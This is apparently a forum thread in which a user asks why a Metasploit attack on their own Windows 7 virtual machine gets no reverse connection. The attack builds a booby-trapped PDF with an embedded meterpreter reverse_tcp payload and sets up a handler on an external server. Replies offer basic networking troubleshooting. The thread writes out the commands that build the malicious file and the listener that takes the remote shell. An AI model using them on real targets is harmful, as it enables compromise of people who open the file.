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Metasploit Reverse Connection Help


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Hello guys,

i wanted to use the Adobe PDF Embedded Exe NOJS Exploit (use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs) on my Ubuntu Server where i installed


After setting up the exploit:

Msf exploit (adobe_pdf_embedded_exe_nojs)>set payload windows/meterpreter/reverse_tcp

Msf exploit (adobe_pdf_embedded_exe_nojs)>set lhost 85.214.XX.XX 

Msf exploit (adobe_pdf_embedded_exe_nojs)>set filename file.pdf

Msf exploit (adobe_pdf_embedded_exe_nojs)>exploit

I used for localhost my Server IP Adress, in case to make a real-world pentesting.

After that, setting up the multi handler to get the reverse connection:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 85.214.XX.XX


I sent the PDF file to my virtual machine, Windows 7.

I run the PDF file, but i didn't get the reverse connection - i didnt received a connection on metasploit.

What am I doing wrong ?

A log of my server:

Linux  3.13.0-48-generic #80-Ubuntu SMP Thu Mar 12 11:16:15 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

Thank you guys.

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Is the viewer that you are using vulnerable?

Why are you using an external IP when doing all the testing internally? Use an internal IP and make sure that the two machines can see each other.

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You can use whatever IP you want as long as the two machines can talk to each other through them. Is the server listening on that IP? Is the port NAT'd through or open?

Not meant as an insult but I'd suggest you learn some basic networking before you try to do exploitation, it will make your life a lot easier.

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